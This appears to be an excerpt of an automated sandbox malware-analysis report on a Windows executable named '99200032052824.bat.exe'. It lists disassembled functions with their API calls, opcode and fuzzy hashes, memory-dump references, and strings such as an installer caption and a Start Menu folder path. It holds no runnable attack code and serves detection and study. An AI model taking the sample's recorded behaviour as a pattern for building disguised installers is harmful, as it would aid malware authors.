
Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 6a14e0956b73ab4e90e394afd1f90f97da6441e28a52e0c2c4c4c0872888fc18
Instruction ID: 442fb056f5e1893a743013a04d3c8a06be4ebfd32780c8d9df4a77f545abccc0
Opcode Fuzzy Hash: 6a14e0956b73ab4e90e394afd1f90f97da6441e28a52e0c2c4c4c0872888fc18
Instruction Fuzzy Hash: 1BE0EDB2B05116ABDB01BBD5AA49CBFA768DF50318F10403BF141F10D1CA7D49029B6D

Function 004022FC Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402335

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
Instruction ID: fc3d639ee2ba9d49225374e904560d05d066977e3d8f4235cfc91afb5433c7ac
Opcode Fuzzy Hash: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
Instruction Fuzzy Hash: 2FE012317005146BD72076B10FCE96F10989BC4308B284D3AF502761C6DDBD4D4245B9

Function 00405E54 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E7D

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 7acc68ffa7400c9eee32ba1e20ae5f36fa8f71d611e671e2c7f17c05e0102792
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: F0E0E67201050DBFEF095F50DD0AD7B371DEB44744F00492EFA45D4090E6B5A9619A74

Function 00405BE0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403177,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BF4

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8

Function 00405BB1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4

Function 73A328E1 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(73A3404C,00000004,00000040,73A3403C), ref: 73A328FF

Memory Dump Source

Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true

Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5a13793dd570a415f9f3b6bb33126bd45406a18a220e0f9e6326db3c96c44c5d
Instruction ID: 3204070e878c3dc531019a8155fe98ed5d34eb938b27bd6268eff38315064496
Opcode Fuzzy Hash: 5a13793dd570a415f9f3b6bb33126bd45406a18a220e0f9e6326db3c96c44c5d
Instruction Fuzzy Hash: 83F07FB2B082A0DEC360EB6A8C877853BE0E31B355B61456AE59CD6285E33C41468F11

Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EB4,?,?,?,?,00000002,Call), ref: 00405E4A

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 00f586757f971d8fddb6ba1a4fa1948c276a5597575d42b2c7248084dade2010
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 36D0EC3200020DBADF115F90ED05FAB371EEB04710F004426BA55A5090D6759520AA58

Function 0040408B Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010420,00000000,00000000,00000000), ref: 0040409D

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
Instruction ID: b9763db4476a092513200920bafbf00b2c19ecde7e8b58ff16c676c9221c7c43
Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
Instruction Fuzzy Hash: 32C04C717406006AEA208B51DD49F0677946750B01F1484397751F50D4C674E410DA1C

Function 00404074 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,?,00403EA4), ref: 00404082

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18

Function 004031C4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 00404061 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E3D), ref: 0040406B

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E9

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7b9632354074489533dafd45b6bc4c0d3204f827ba2cfbbd71c55f5045c93cde
Instruction ID: 4f2bdf6dfe5cf4b60dd5b7335af101e6a5cbd4d7fd56710333224b44724b1ee5
Opcode Fuzzy Hash: 7b9632354074489533dafd45b6bc4c0d3204f827ba2cfbbd71c55f5045c93cde
Instruction Fuzzy Hash: BFD05B73B101419BD714E7F8B98485F73B4DB503153204837D441E2091D578C5424A28

Non-executed Functions

Function 00404A44 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A5C
GetDlgItem.USER32(?,00000408), ref: 00404A67
GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
LoadBitmapA.USER32(0000006E), ref: 00404AC4
SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
DeleteObject.GDI32(00000000), ref: 00404B3A
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
GetWindowLongA.USER32(?,000000F0), ref: 00404C74
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
ShowWindow.USER32(?,00000005), ref: 00404C93
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
ImageList_Destroy.COMCTL32(00000000), ref: 00404E63
GlobalFree.KERNEL32(00000000), ref: 00404E73
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
InvalidateRect.USER32(?,00000000,?), ref: 00404FC4
ShowWindow.USER32(?,00000000), ref: 00405012
GetDlgItem.USER32(?,000003FE), ref: 0040501D
ShowWindow.USER32(00000000), ref: 00405024

Strings

, xrefs: 00404FFC
M, xrefs: 00404BED
N, xrefs: 00404CCE

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
Opcode Fuzzy Hash: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58

Function 004044D1 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404520
SetWindowTextA.USER32(00000000,?), ref: 0040454A
SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
CoTaskMemFree.OLE32(00000000), ref: 00404606
lstrcmpiA.KERNEL32(Call,Inquiring Setup: Installing), ref: 00404638
lstrcatA.KERNEL32(?,Call), ref: 00404644
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656

Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3

Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\99200032052824.bat.exe",75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
Part of subcall function 0040620A: CharNextA.USER32(?,"C:\Users\user\Desktop\99200032052824.bat.exe",75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
Part of subcall function 0040620A: CharPrevA.USER32(?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284

GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,?,00429840,?,?,000003FB,?), ref: 00404714
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F

Part of subcall function 00404888: lstrlenA.KERNEL32(Inquiring Setup: Installing,Inquiring Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
Part of subcall function 00404888: SetDlgItemTextA.USER32(?,Inquiring Setup: Installing), ref: 00404941

Strings

Inquiring Setup: Installing, xrefs: 004045CE, 00404631
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort, xrefs: 00404621
Call, xrefs: 00404632, 00404637, 00404642
A, xrefs: 004045F4

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort$Call$Inquiring Setup: Installing
API String ID: 2624150263-4265126013
Opcode ID: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
Opcode Fuzzy Hash: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D

Function 73A31A98 Relevance: 18.5, APIs: 12, Instructions: 537stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 73A31215: GlobalAlloc.KERNEL32(00000040,73A31233,?,73A312CF,-73A3404B,73A311AB,-000000A0), ref: 73A3121D

GlobalAlloc.KERNEL32(00000040,000014A4), ref: 73A31BA2
lstrcpyA.KERNEL32(00000008,?), ref: 73A31BEA
lstrcpyA.KERNEL32(00000408,?), ref: 73A31BF4
GlobalFree.KERNEL32(00000000), ref: 73A31C07
GlobalFree.KERNEL32(?), ref: 73A31CE7
GlobalFree.KERNEL32(?), ref: 73A31CEC
GlobalFree.KERNEL32(?), ref: 73A31CF1
GlobalFree.KERNEL32(00000000), ref: 73A31ED8

Memory Dump Source

Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true

